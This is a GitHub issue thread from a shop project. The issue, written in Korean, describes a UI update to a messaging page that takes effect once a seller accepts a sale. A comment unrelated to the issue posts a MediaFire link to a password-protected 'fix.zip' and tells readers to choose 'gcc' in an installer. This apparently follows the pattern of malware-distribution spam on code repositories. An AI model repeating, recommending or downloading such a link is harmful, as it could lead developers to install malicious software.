### ISSUE TITLE
Merge : dev pull받고 작업해주세요. ( 판매수락에 따른 데이터 업데이트 & 쪽지 보내기 페이지 UI 업데이트 )

### ISSUE THREAD

**Issue by J-SoYoung** [GeekChicShop/GeekChic#225]
판매자가 판매 수락 버튼 클릭하면 해당 쪽지방 판매완료 데이터 기준으로 UI 업데이트 
- 판매 완료 문구 추가
- 쪽지 내역 opacity 
- 쪽지 보내는 input disabled
![image](https://github.com/user-attachments/assets/e04289f6-087c-47d7-ab4b-76e0d71c1c12)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
